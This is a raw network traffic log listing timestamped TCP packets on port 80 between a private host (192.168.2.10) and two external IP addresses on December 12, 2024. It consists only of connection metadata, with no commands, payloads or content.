                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483123064 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483167887 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483484983 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483683109 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483716965 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483722925 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.483752966 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.484591007 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.484639883 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.484816074 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.484853029 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.485522032 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.485557079 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.485606909 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.485639095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.486542940 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.486598015 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.486634970 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.487581968 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.487592936 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.487632990 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.488487005 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.488528967 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.489206076 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.489242077 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.489468098 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.489509106 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.489609003 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.490461111 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.490530014 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.490667105 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.490708113 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.491434097 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.491477966 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.491708040 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.492377043 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.492428064 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.492748976 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.492789984 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.493336916 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.493504047 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.493546009 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.494350910 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.494550943 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.494575024 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.494606018 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.495354891 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.495364904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.495397091 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.495413065 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.496730089 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.496881962 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.496922016 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.497234106 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.497277021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.497339010 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.497374058 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.498256922 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.498492002 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.498554945 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.499223948 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.499270916 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.499403954 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.499438047 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.500185966 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.500452995 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.500667095 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.500708103 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.501179934 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.501214981 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.501270056 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.501741886 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.502136946 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.502190113 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.502435923 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.502475023 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.503086090 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.503127098 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.503289938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.503328085 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.504172087 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.504215956 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.504261971 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.504431009 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.505116940 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.505177021 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.505254984 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.505289078 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.506048918 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.506067991 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.506109953 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.507021904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.507070065 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.507332087 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.507371902 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.507992029 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.508035898 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.508094072 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.508188963 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.509059906 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.509094954 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.509258032 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.509375095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.511209965 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.511305094 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.511358976 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.511771917 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512036085 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512093067 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512317896 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512360096 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512821913 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512866974 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512871027 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512881994 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512903929 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.512923002 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.513884068 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.513902903 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.513953924 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.514813900 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.514868975 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.515002966 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.515115023 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.515821934 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.515919924 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.515991926 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.515991926 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.516798973 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.516840935 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.517018080 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.517117023 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.517786980 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.517827034 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.517852068 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.517884016 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.518805981 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.518996000 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.519052029 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.519856930 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.519948959 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.520003080 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.520677090 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.520721912 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.521233082 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.521298885 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.521651983 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.521838903 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.521846056 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.521877050 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.522629023 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.522680998 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.523438931 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.523482084 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.523669958 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.523679972 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.523806095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.523806095 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.524619102 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.524657011 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.525034904 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.525072098 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.525589943 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.525674105 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.525758028 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.525846958 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.526628017 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.526639938 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.526686907 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.527544975 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.527590990 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.527924061 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.528520107 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.528557062 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.528976917 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.529007912 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.529509068 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.529541969 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.529684067 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.529716015 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.530488014 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.530538082 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.530793905 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.530834913 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.531431913 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.531471968 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.531744003 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.531785011 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.532394886 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.532437086 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.532496929 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.532650948 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.533498049 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.533508062 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.533545017 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534059048 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534188986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534316063 CET8049957185.215.113.16192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534423113 CET4995780192.168.2.10185.215.113.16
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534446955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534667015 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534706116 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.534801006 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.535614014 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.535665035 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.535993099 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.536737919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.536789894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.536883116 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.537631989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.537781954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.538688898 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.538716078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.538770914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.538800001 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.539702892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.539931059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.540179968 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.540728092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.540740013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.540832043 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.541678905 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.541896105 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.542020082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.542697906 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.542985916 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.543061018 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.543735981 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.543910980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.543987989 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.544729948 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.544893980 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.544975042 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.545753002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.546099901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.546178102 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.546789885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.547182083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.547265053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.547766924 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.547923088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.547996998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.548815966 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.549001932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.549081087 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.549809933 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.549984932 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.550074100 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.550906897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.551928997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.551939964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.551949024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.552027941 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.552046061 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.552850008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.553224087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.553311110 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:47.553884029 CET8049946185.81.68.147192.168.2.10
